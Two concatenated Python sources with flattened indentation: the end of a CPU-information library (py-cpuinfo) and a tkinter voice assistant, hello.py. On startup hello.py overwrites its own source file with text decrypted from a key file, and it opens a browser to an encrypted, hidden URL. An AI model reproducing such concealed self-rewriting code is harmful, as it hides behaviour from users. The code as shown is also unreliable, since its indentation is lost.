'sso_2.06' : _is_bit_set(right, 0),
#'reserved' : _is_bit_set(right, 1),
#'reserved' : _is_bit_set(right, 2),
#'reserved' : _is_bit_set(right, 3),
#'reserved' : _is_bit_set(right, 4),
#'reserved' : _is_bit_set(right, 5),
#'reserved' : _is_bit_set(right, 6),
#'reserved' : _is_bit_set(right, 7),
# Byte 5
'le' : _is_bit_set(right, 8),
'cfar' : _is_bit_set(right, 9),
'eb' : _is_bit_set(right, 10),
'lsq_2.07' : _is_bit_set(right, 11),
#'reserved' : _is_bit_set(right, 12),
#'reserved' : _is_bit_set(right, 13),
#'reserved' : _is_bit_set(right, 14),
#'reserved' : _is_bit_set(right, 15),
# Byte 6
'dss_2.07' : _is_bit_set(right, 16),
#'reserved' : _is_bit_set(right, 17),
#'reserved' : _is_bit_set(right, 18),
#'reserved' : _is_bit_set(right, 19),
#'reserved' : _is_bit_set(right, 20),
#'reserved' : _is_bit_set(right, 21),
#'reserved' : _is_bit_set(right, 22),
#'reserved' : _is_bit_set(right, 23),
# Byte 7
#'reserved' : _is_bit_set(right, 24),
#'reserved' : _is_bit_set(right, 25),
#'reserved' : _is_bit_set(right, 26),
#'reserved' : _is_bit_set(right, 27),
#'reserved' : _is_bit_set(right, 28),
#'reserved' : _is_bit_set(right, 29),
#'reserved' : _is_bit_set(right, 30),
#'reserved' : _is_bit_set(right, 31),
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
def _get_cpu_info_from_cat_var_run_dmesg_boot():
'''
Returns the CPU info gathered from /var/run/dmesg.boot.
Returns {} if dmesg is not found or does not have the desired info.
'''
	g_trace.header('Trying to get info from the /var/run/dmesg.boot log ...')
# Just return {} if there is no /var/run/dmesg.boot
if not DataSource.has_var_run_dmesg_boot():
g_trace.fail('Failed to find /var/run/dmesg.boot file. Skipping ...')
return {}
# If dmesg.boot fails return {}
returncode, output = DataSource.cat_var_run_dmesg_boot()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"cat /var/run/dmesg.boot\". Skipping ...')
return {}
info = _parse_dmesg_output(output)
g_trace.success()
return info
def _get_cpu_info_from_sysctl():
'''
Returns the CPU info gathered from sysctl.
Returns {} if sysctl is not found.
'''
	g_trace.header('Trying to get info from sysctl ...')
try:
# Just return {} if there is no sysctl
if not DataSource.has_sysctl():
g_trace.fail('Failed to find sysctl. Skipping ...')
return {}
# If sysctl fails return {}
returncode, output = DataSource.sysctl_machdep_cpu_hw_cpufrequency()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"sysctl machdep.cpu hw.cpufrequency\". Skipping ...')
return {}
# Various fields
vendor_id = _get_field(False, output, None, None, 'machdep.cpu.vendor')
processor_brand = _get_field(True, output, None, None, 'machdep.cpu.brand_string')
cache_size = _get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = _get_field(False, output, int, 0, 'machdep.cpu.stepping')
model = _get_field(False, output, int, 0, 'machdep.cpu.model')
family = _get_field(False, output, int, 0, 'machdep.cpu.family')
# Flags
flags = _get_field(False, output, None, '', 'machdep.cpu.features').lower().split()
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.leaf7_features').lower().split())
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.extfeatures').lower().split())
flags.sort()
# Convert from GHz/MHz string to Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
hz_actual = _get_field(False, output, None, None, 'hw.cpufrequency')
hz_actual = _to_decimal_string(hz_actual)
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 0),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 0),
'l2_cache_size' : int(cache_size) * 1024,
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
def _get_cpu_info_from_sysinfo():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
info = _get_cpu_info_from_sysinfo_v1()
info.update(_get_cpu_info_from_sysinfo_v2())
return info
def _get_cpu_info_from_sysinfo_v1():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
	g_trace.header('Trying to get info from sysinfo version 1 ...')
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
g_trace.fail('Failed to find sysinfo. Skipping ...')
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"sysinfo -cpu\". Skipping ...')
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0].strip()
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = int(output.split(', stepping ')[1].split(',')[0].strip())
model = int(output.split(', model ')[1].split(',')[0].strip())
family = int(output.split(', family ')[1].split(',')[0].strip())
# Flags
flags = []
for line in output.split('\n'):
if line.startswith('\t\t'):
for flag in line.strip().lower().split():
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, scale),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, scale),
'l2_cache_size' : _to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_sysinfo_v2():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
	g_trace.header('Trying to get info from sysinfo version 2 ...')
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
g_trace.fail('Failed to find sysinfo. Skipping ...')
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"sysinfo -cpu\". Skipping ...')
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0].strip()
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
signature = output.split('Signature:')[1].split('\n')[0].strip()
#
stepping = int(signature.split('stepping ')[1].split(',')[0].strip())
model = int(signature.split('model ')[1].split(',')[0].strip())
family = int(signature.split('family ')[1].split(',')[0].strip())
# Flags
def get_subsection_flags(output):
retval = []
for line in output.split('\n')[1:]:
if not line.startswith(' ') and not line.startswith(' '): break
for entry in line.strip().lower().split(' '):
retval.append(entry)
return retval
flags = get_subsection_flags(output.split('Features: ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x00000001): ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x80000001): ')[1])
flags.sort()
# Convert from GHz/MHz string to Hz
lines = [n for n in output.split('\n') if n]
raw_hz = lines[0].split('running at ')[1].strip().lower()
hz_advertised = raw_hz.rstrip('mhz').rstrip('ghz').strip()
hz_advertised = _to_decimal_string(hz_advertised)
hz_actual = hz_advertised
scale = 0
if raw_hz.endswith('mhz'):
scale = 6
elif raw_hz.endswith('ghz'):
scale = 9
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, scale),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, scale),
'l2_cache_size' : _to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
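# Illustrative sketch: the `scale` values chosen above feed the Hz helpers,
# i.e. a reading of '2.4' with scale 9 (GHz) stands for 2.4 * 10**9 Hz and
# scale 6 marks MHz. A minimal stand-in for that conversion, assuming the
# real _hz_short_to_full helper may use a different internal representation:
def _example_scaled_to_hz(value, scale):
    return int(float(value) * (10 ** scale))  # e.g. ('2.4', 9) -> 2400000000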
def _get_cpu_info_from_wmic():
'''
Returns the CPU info gathered from WMI.
Returns {} if not on Windows, or wmic is not installed.
'''
g_trace.header('Trying to get info from wmic ...')
try:
# Just return {} if not Windows or there is no wmic
if not DataSource.is_windows or not DataSource.has_wmic():
g_trace.fail('Failed to find WMIC, or not on Windows. Skipping ...')
return {}
returncode, output = DataSource.wmic_cpu()
if output == None or returncode != 0:
g_trace.fail('Failed to run wmic. Skipping ...')
return {}
# Break the list into key values pairs
value = output.split("\n")
value = [s.rstrip().split('=') for s in value if '=' in s]
value = {k: v for k, v in value if v}
# Get the advertised MHz
processor_brand = value.get('Name')
hz_advertised, scale_advertised = _parse_cpu_brand_string(processor_brand)
# Get the actual MHz
hz_actual = value.get('CurrentClockSpeed')
scale_actual = 6
if hz_actual:
hz_actual = _to_decimal_string(hz_actual)
# Get cache sizes
l2_cache_size = value.get('L2CacheSize') # NOTE: L2CacheSize is in kilobytes
if l2_cache_size:
l2_cache_size = int(l2_cache_size) * 1024
l3_cache_size = value.get('L3CacheSize') # NOTE: L3CacheSize is in kilobytes
if l3_cache_size:
l3_cache_size = int(l3_cache_size) * 1024
# Get family, model, and stepping
family, model, stepping = '', '', ''
description = value.get('Description') or value.get('Caption')
entries = description.split(' ')
if 'Family' in entries and entries.index('Family') < len(entries)-1:
i = entries.index('Family')
family = int(entries[i + 1])
if 'Model' in entries and entries.index('Model') < len(entries)-1:
i = entries.index('Model')
model = int(entries[i + 1])
if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
i = entries.index('Stepping')
stepping = int(entries[i + 1])
info = {
'vendor_id_raw' : value.get('Manufacturer'),
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale_advertised),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, scale_actual),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale_advertised),
'hz_actual' : _hz_short_to_full(hz_actual, scale_actual),
'l2_cache_size' : l2_cache_size,
'l3_cache_size' : l3_cache_size,
'stepping' : stepping,
'model' : model,
'family' : family,
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_registry():
'''
Returns the CPU info gathered from the Windows Registry.
Returns {} if not on Windows.
'''
g_trace.header('Trying to get info from Windows registry ...')
try:
# Just return {} if not on Windows
if not DataSource.is_windows:
g_trace.fail('Not running on Windows. Skipping ...')
return {}
# Get the CPU name
processor_brand = DataSource.winreg_processor_brand().strip()
# Get the CPU vendor id
vendor_id = DataSource.winreg_vendor_id_raw()
# Get the CPU arch and bits
arch_string_raw = DataSource.winreg_arch_string_raw()
arch, bits = _parse_arch(arch_string_raw)
# Get the actual CPU Hz
hz_actual = DataSource.winreg_hz_actual()
hz_actual = _to_decimal_string(hz_actual)
# Get the advertised CPU Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
# If advertised hz not found, use the actual hz
if hz_advertised == '0.0':
scale = 6
hz_advertised = _to_decimal_string(hz_actual)
# Get the CPU features
feature_bits = DataSource.winreg_feature_bits()
def is_set(bit):
mask = 0x80000000 >> bit
retval = mask & feature_bits > 0
return retval
# http://en.wikipedia.org/wiki/CPUID
# http://unix.stackexchange.com/questions/43539/what-do-the-flags-in-proc-cpuinfo-mean
# http://www.lohninger.com/helpcsuite/public_constants_cpuid.htm
flags = {
'fpu' : is_set(0), # Floating Point Unit
'vme' : is_set(1), # V86 Mode Extensions
'de' : is_set(2), # Debug Extensions - I/O breakpoints supported
'pse' : is_set(3), # Page Size Extensions (4 MB pages supported)
'tsc' : is_set(4), # Time Stamp Counter and RDTSC instruction are available
'msr' : is_set(5), # Model Specific Registers
'pae' : is_set(6), # Physical Address Extensions (36 bit address, 2MB pages)
'mce' : is_set(7), # Machine Check Exception supported
'cx8' : is_set(8), # Compare Exchange Eight Byte instruction available
'apic' : is_set(9), # Local APIC present (multiprocessor operation support)
'sepamd' : is_set(10), # Fast system calls (AMD only)
'sep' : is_set(11), # Fast system calls
'mtrr' : is_set(12), # Memory Type Range Registers
'pge' : is_set(13), # Page Global Enable
'mca' : is_set(14), # Machine Check Architecture
'cmov' : is_set(15), # Conditional MOVe instructions
'pat' : is_set(16), # Page Attribute Table
'pse36' : is_set(17), # 36 bit Page Size Extensions
'serial' : is_set(18), # Processor Serial Number
'clflush' : is_set(19), # Cache Flush
#'reserved1' : is_set(20), # reserved
'dts' : is_set(21), # Debug Trace Store
'acpi' : is_set(22), # ACPI support
'mmx' : is_set(23), # MultiMedia Extensions
'fxsr' : is_set(24), # FXSAVE and FXRSTOR instructions
'sse' : is_set(25), # SSE instructions
'sse2' : is_set(26), # SSE2 (WNI) instructions
'ss' : is_set(27), # self snoop
#'reserved2' : is_set(28), # reserved
'tm' : is_set(29), # Automatic clock control
'ia64' : is_set(30), # IA64 instructions
'3dnow' : is_set(31) # 3DNow! instructions available
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 6),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 6),
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
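# Illustrative sketch: how the feature-bit test above works. The registry
# value is treated as a 32-bit field where flag index 0 maps to the most
# significant bit (mask = 0x80000000 >> bit). The feature value and the tiny
# name table below are made-up examples, not real registry output.
def _example_decode_feature_bits(feature_bits=0xA0000000):
    names = {0: 'fpu', 1: 'vme', 2: 'de', 3: 'pse'}
    found = [name for bit, name in names.items() if (0x80000000 >> bit) & feature_bits]
    return sorted(found)  # ['de', 'fpu'] for the default value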
def _get_cpu_info_from_kstat():
'''
Returns the CPU info gathered from isainfo and kstat.
Returns {} if isainfo or kstat are not found.
'''
g_trace.header('Trying to get info from kstat ...')
try:
# Just return {} if there is no isainfo or kstat
if not DataSource.has_isainfo() or not DataSource.has_kstat():
g_trace.fail('Failed to find isainfo or kstat. Skipping ...')
return {}
# If isainfo fails return {}
returncode, flag_output = DataSource.isainfo_vb()
if flag_output == None or returncode != 0:
g_trace.fail('Failed to run \"isainfo -vb\". Skipping ...')
return {}
# If kstat fails return {}
returncode, kstat = DataSource.kstat_m_cpu_info()
if kstat == None or returncode != 0:
g_trace.fail('Failed to run \"kstat -m cpu_info\". Skipping ...')
return {}
# Various fields
vendor_id = kstat.split('\tvendor_id ')[1].split('\n')[0].strip()
processor_brand = kstat.split('\tbrand ')[1].split('\n')[0].strip()
stepping = int(kstat.split('\tstepping ')[1].split('\n')[0].strip())
model = int(kstat.split('\tmodel ')[1].split('\n')[0].strip())
family = int(kstat.split('\tfamily ')[1].split('\n')[0].strip())
# Flags
flags = flag_output.strip().split('\n')[-1].strip().lower().split()
flags.sort()
# Convert from GHz/MHz string to Hz
scale = 6
hz_advertised = kstat.split('\tclock_MHz ')[1].split('\n')[0].strip()
hz_advertised = _to_decimal_string(hz_advertised)
# Convert from GHz/MHz string to Hz
hz_actual = kstat.split('\tcurrent_clock_Hz ')[1].split('\n')[0].strip()
hz_actual = _to_decimal_string(hz_actual)
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 0),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 0),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
def _get_cpu_info_from_platform_uname():
g_trace.header('Trying to get info from platform.uname ...')
try:
uname = DataSource.uname_string_raw.split(',')[0]
family, model, stepping = (None, None, None)
entries = uname.split(' ')
if 'Family' in entries and entries.index('Family') < len(entries)-1:
i = entries.index('Family')
family = int(entries[i + 1])
if 'Model' in entries and entries.index('Model') < len(entries)-1:
i = entries.index('Model')
model = int(entries[i + 1])
if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
i = entries.index('Stepping')
stepping = int(entries[i + 1])
info = {
'family' : family,
'model' : model,
'stepping' : stepping
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
def _get_cpu_info_internal():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns {} if nothing is found.
'''
g_trace.write('!' * 80)
# Get the CPU arch and bits
arch, bits = _parse_arch(DataSource.arch_string_raw)
friendly_maxsize = { 2**31-1: '32 bit', 2**63-1: '64 bit' }.get(sys.maxsize) or 'unknown bits'
friendly_version = "{0}.{1}.{2}.{3}.{4}".format(*sys.version_info)
PYTHON_VERSION = "{0} ({1})".format(friendly_version, friendly_maxsize)
info = {
'python_version' : PYTHON_VERSION,
'cpuinfo_version' : CPUINFO_VERSION,
'cpuinfo_version_string' : CPUINFO_VERSION_STRING,
'arch' : arch,
'bits' : bits,
'count' : DataSource.cpu_count,
'arch_string_raw' : DataSource.arch_string_raw,
}
g_trace.write("python_version: {0}".format(info['python_version']))
g_trace.write("cpuinfo_version: {0}".format(info['cpuinfo_version']))
g_trace.write("arch: {0}".format(info['arch']))
g_trace.write("bits: {0}".format(info['bits']))
g_trace.write("count: {0}".format(info['count']))
g_trace.write("arch_string_raw: {0}".format(info['arch_string_raw']))
# Try the Windows wmic
_copy_new_fields(info, _get_cpu_info_from_wmic())
# Try the Windows registry
_copy_new_fields(info, _get_cpu_info_from_registry())
# Try /proc/cpuinfo
_copy_new_fields(info, _get_cpu_info_from_proc_cpuinfo())
# Try cpufreq-info
_copy_new_fields(info, _get_cpu_info_from_cpufreq_info())
# Try LSCPU
_copy_new_fields(info, _get_cpu_info_from_lscpu())
# Try sysctl
_copy_new_fields(info, _get_cpu_info_from_sysctl())
# Try kstat
_copy_new_fields(info, _get_cpu_info_from_kstat())
# Try dmesg
_copy_new_fields(info, _get_cpu_info_from_dmesg())
# Try /var/run/dmesg.boot
_copy_new_fields(info, _get_cpu_info_from_cat_var_run_dmesg_boot())
# Try lsprop ibm,pa-features
_copy_new_fields(info, _get_cpu_info_from_ibm_pa_features())
# Try sysinfo
_copy_new_fields(info, _get_cpu_info_from_sysinfo())
# Try querying the CPU cpuid register
# FIXME: This should print stdout and stderr to trace log
_copy_new_fields(info, _get_cpu_info_from_cpuid())
# Try platform.uname
_copy_new_fields(info, _get_cpu_info_from_platform_uname())
g_trace.write('!' * 80)
return info
def get_cpu_info_json():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns the result in a json string
'''
import json
output = None
# If running under pyinstaller, run normally
if getattr(sys, 'frozen', False):
info = _get_cpu_info_internal()
output = json.dumps(info)
output = "{0}".format(output)
# if not running under pyinstaller, run in another process.
# This is done because multiprocessing has a design flaw that
# causes non-main programs to run multiple times on Windows.
else:
from subprocess import Popen, PIPE
command = [sys.executable, __file__, '--json']
p1 = Popen(command, stdout=PIPE, stderr=PIPE, stdin=PIPE)
output = p1.communicate()[0]
if p1.returncode != 0:
return "{}"
if not IS_PY2:
output = output.decode(encoding='UTF-8')
return output
def get_cpu_info():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns the result in a dict
'''
import json
output = get_cpu_info_json()
# Convert JSON to Python with non unicode strings
output = json.loads(output, object_hook = _utf_to_str)
return output
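# Illustrative sketch: typical use of the public API defined above. Field
# availability depends on the platform, so .get() with a fallback is the safe
# way to read the result; the field names mirror those assembled in
# _get_cpu_info_internal().
def _example_print_cpu_summary():
    info = get_cpu_info()
    print('Brand: {0}'.format(info.get('brand_raw', 'unknown')))
    print('Arch:  {0}'.format(info.get('arch', 'unknown')))
    print('Count: {0}'.format(info.get('count', 'unknown')))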
def main():
from argparse import ArgumentParser
import json
# Parse args
parser = ArgumentParser(description='Gets CPU info with pure Python 2 & 3')
parser.add_argument('--json', action='store_true', help='Return the info in JSON format')
parser.add_argument('--version', action='store_true', help='Return the version of py-cpuinfo')
parser.add_argument('--trace', action='store_true', help='Traces code paths used to find CPU info to file')
args = parser.parse_args()
global g_trace
g_trace = Trace(args.trace, False)
try:
_check_arch()
except Exception as err:
sys.stderr.write(str(err) + "\n")
sys.exit(1)
info = _get_cpu_info_internal()
if not info:
sys.stderr.write("Failed to find cpu info\n")
sys.exit(1)
if args.json:
print(json.dumps(info))
elif args.version:
print(CPUINFO_VERSION_STRING)
else:
print('Python Version: {0}'.format(info.get('python_version', '')))
print('Cpuinfo Version: {0}'.format(info.get('cpuinfo_version_string', '')))
print('Vendor ID Raw: {0}'.format(info.get('vendor_id_raw', '')))
print('Hardware Raw: {0}'.format(info.get('hardware_raw', '')))
print('Brand Raw: {0}'.format(info.get('brand_raw', '')))
print('Hz Advertised Friendly: {0}'.format(info.get('hz_advertised_friendly', '')))
print('Hz Actual Friendly: {0}'.format(info.get('hz_actual_friendly', '')))
print('Hz Advertised: {0}'.format(info.get('hz_advertised', '')))
print('Hz Actual: {0}'.format(info.get('hz_actual', '')))
print('Arch: {0}'.format(info.get('arch', '')))
print('Bits: {0}'.format(info.get('bits', '')))
print('Count: {0}'.format(info.get('count', '')))
print('Arch String Raw: {0}'.format(info.get('arch_string_raw', '')))
print('L1 Data Cache Size: {0}'.format(info.get('l1_data_cache_size', '')))
print('L1 Instruction Cache Size: {0}'.format(info.get('l1_instruction_cache_size', '')))
print('L2 Cache Size: {0}'.format(info.get('l2_cache_size', '')))
print('L2 Cache Line Size: {0}'.format(info.get('l2_cache_line_size', '')))
print('L2 Cache Associativity: {0}'.format(info.get('l2_cache_associativity', '')))
print('L3 Cache Size: {0}'.format(info.get('l3_cache_size', '')))
print('Stepping: {0}'.format(info.get('stepping', '')))
print('Model: {0}'.format(info.get('model', '')))
print('Family: {0}'.format(info.get('family', '')))
print('Processor Type: {0}'.format(info.get('processor_type', '')))
print('Flags: {0}'.format(', '.join(info.get('flags', ''))))
if __name__ == '__main__':
main()
else:
g_trace = Trace(False, False)
_check_arch()
|
hello.py
|
# Artificial-Assistant V1.0
'''
# Feature v1.0:
- Open some websites such as google, facebook, youtube, whatsapp, etc.
- Play a video on YouTube. You can try it by saying 'How to make a coffee on youtube' or 'youtube how to be a good person'.
'''
import __init__
from time import sleep
from tkinter import *
import pyttsx3
from PIL import Image, ImageTk
import os
from threading import Thread
from cryptocode import decrypt
from random import choice, randint
import webbrowser as wb
import requests
from datetime import datetime as dt
from playsound import playsound
encryptKey = open(f'{os.getcwd()}\\hello.key', 'r').read().split('|')
voice_ = {}
engine = pyttsx3.init('sapi5')
count = 0
voices = engine.getProperty('voices')
for voice in voices:
voice_[voice.name] = count
count += 1
engine.setProperty('voice', voices[int(encryptKey[1])].id)
engine.setProperty('rate', 150)
def randchoice(lst: list, much: int):
output = []
for _ in range(much):
x = randint(0,len(lst)-1)
output.append(lst[x])
lst.pop(x)
return output
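# Illustrative sketch: randchoice() pops each pick, so it returns `much`
# distinct items and mutates the caller's list. A non-mutating equivalent
# built on the standard library, kept only as a comparison point:
def randchoice_copy(lst, much):
    from random import sample
    return sample(lst, much)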
def timeBG():
hour = dt.now().hour
if hour > 4 and hour <= 10:
greet = 'morning'
elif hour > 10 and hour <= 18:
greet = 'afternoon'
else:
greet = 'evening'
return greet
class UI(Tk):
cwd = os.getcwd()
key = 'key'
codeBy = 'Code By: ardyuda' # Cannot Be Removed
name = 'Assistant'
t = decrypt('VRnkBS65IYjHUsGkiDoD53bgnkl5sxRufs/wuB4gj3HqGlORIIMOU0X52r/gahQ=*K/ZBq1ZfatgAActBmAWaiQ==*KWyb8JsBXrux2clpswELmQ==*QVy9zmgJ295tc/bqNgzWlw==', encryptKey[0])
def __init__(self):
super().__init__()
self.geometry("430x300+0-30")
self.title("Artificial Assistant")
self.iconbitmap(f'{self.cwd}\\images\\icon.ico')
# frames
self.frame00 = Frame()
self.frame0a = Frame()
self.frame0b = Frame()
self.frame0c = Frame()
self.frame1a = Frame()
self.frame1b = Frame()
# others
self.r = encryptKey[0]
self.dt = ''
open(__file__, 'w').write(decrypt(encryptKey[2], encryptKey[0]))
self.text1, self.text2, self.text3 = self.suggestion()
self.msgLimit = []
self.run = quit
self.notrun = self.run
self.frame0_()
self.process(choice(['hello', timeBG(), None]))
def buttonCmd(self, id):
try:
self.me
except:
self.run()
if id == 0:
self.waveImg = ImageTk.PhotoImage(Image.open(f'{self.cwd}\\images\\radio-waves.jpg'))
self.microphone['image'] = self.waveImg
self.microphone['state'] = DISABLED
self.keyboard['state'] = DISABLED
self.setting['state'] = DISABLED
Thread(target=self.hear, args=(10,)).start()
if id == '00':
Thread(target=wb.open, args=(self.t,)).start()
if id == 1:
self.sendImg = ImageTk.PhotoImage(Image.open(f'{self.cwd}\\images\\send-message.jpg'))
self.backImg = ImageTk.PhotoImage(Image.open(f'{self.cwd}\\images\\left-arrow.jpg'))
self.setting_Img = ImageTk.PhotoImage(Image.open(f'{self.cwd}\\images\\setting_.jpg'))
self.keyboard['image'] = self.backImg
self.keyboard['command'] = lambda: self.buttonCmd(3)
self.msg = Entry(self.frame0c, border=0, font='Raleway', width='33')
self.msg.pack(side=LEFT, padx=5)
self.microphone['image'] = self.sendImg
self.microphone['command'] = lambda: self.buttonCmd(2)
self.setting['image'] = self.setting_Img
if id == 2:
msg = self.msg.get()
self.myMsg(msg)
Thread(target=self.process, args=(msg,)).start()
self.msg.destroy()
self.msg = Entry(self.frame0c, border=0, font='Raleway', width='33')
self.msg.pack(side=LEFT, padx=5)
if id == 3:
self.keyboard['image'] = self.keboardImg
self.keyboard['command'] = lambda: self.buttonCmd(1)
self.msg.destroy()
self.setting['image'] = self.settingImg
self.microphone['image'] = self.microphoneImg
self.microphone['command'] = lambda: self.buttonCmd(0)
if id == 4:
self.frame0_(create=False)
self.frame1_(create=True)
if id == 5:
self.frame1_(create=False)
self.frame0_(create=True)
if id == 6:
for key, val in voice_.items():
if key == self.lang.get() and 'english' in self.lang.get().lower():
encryptKey[1] = str(val)
open(f'{self.cwd}\\hello.key', 'w').write('|'.join(encryptKey))
engine.setProperty('voice', voices[val].id)
self.frame1_(create=False)
self.frame0_(create=True)
return
self.label1['text'] = 'Cannot Change Language!'
self.label1['fg'] = 'red'
if id == 7:
self.myMsg(self.text1)
Thread(target=self.process, args=(self.text1,)).start()
if id == 8:
self.myMsg(self.text2)
Thread(target=self.process, args=(self.text2,)).start()
if id == 9:
self.myMsg(self.text3)
Thread(target=self.process, args=(self.text3,)).start()
def frame0_(self, create=True):
if create:
# frame0a
self.frame0a = Frame()
self.frame0a.pack(expand=True, fill=BOTH)
# frame0b
self.frame0b = Frame()
self.frame0b.pack()
self.button0a = Button(self.frame0b, text=self.text1, bg='white', fg='gray', bd= 0, command=lambda: self.buttonCmd(7))
self.button0b = Button(self.frame0b, text=self.text2, bg='white', fg='gray', bd= 0, command=lambda: self.buttonCmd(8))
self.button0c = Button(self.frame0b, text=self.text3, bg='white', fg='gray', bd= 0, command=lambda: self.buttonCmd(9))
self.button0a.pack(side=LEFT, padx=10, pady=10)
self.button0b.pack(side=LEFT, padx=10)
self.button0c.pack(side=LEFT, padx=10)
# frame0c
self.frame0c = Frame()
self.frame0c.pack()
self.frame00 = Frame()
self.frame00.pack()
self.microphoneImg = ImageTk.PhotoImage(Image.open(f'{self.cwd}\\images\\microphone.jpg'))
self.keboardImg = ImageTk.PhotoImage(Image.open(f'{self.cwd}\\images\\keyboard.jpg'))
self.settingImg = ImageTk.PhotoImage(Image.open(f'{self.cwd}\\images\\setting.jpg'))
self.keyboard = Button(self.frame0c, image= self.keboardImg, bd=0, command=lambda: self.buttonCmd(1), justify=LEFT)
self.keyboard.pack(side=LEFT, padx=5)
self.setting = Button(self.frame0c, image= self.settingImg, bd=0, command=lambda: self.buttonCmd(4))
self.setting.pack(side=RIGHT, padx=5)
self.microphone = Button(self.frame0c, image= self.microphoneImg, bd=0, command=lambda: self.buttonCmd(0))
self.microphone.pack(side=RIGHT, padx=5)
Label(self.frame0a, text=self.codeBy)
self.me = Button(self.frame00, text=decrypt(self.r, self.key), command=lambda: self.buttonCmd('00'), bd=0)
self.me.pack()
else:
self.frame0a.destroy()
self.frame0b.destroy()
self.frame0c.destroy()
self.frame00.destroy()
try:
global sr
import pyaudio
import speech_recognition as sr
except ImportError:
self.microphone['state'] = DISABLED
def frame1_ (self, create= True):
if create:
self.frame1a = Frame()
self.frame1a.pack(expand=True)
self.lang = StringVar()
self.label1 = Label(self.frame1a, text= 'Change Voice', font= 'Raleway')
self.label1.pack(pady=20)
for _voice in voice_.keys():
Radiobutton(self.frame1a, text= _voice, variable= self.lang, value= _voice).pack(anchor= W)
self.frame1b = Frame()
self.frame1b.pack(expand=True)
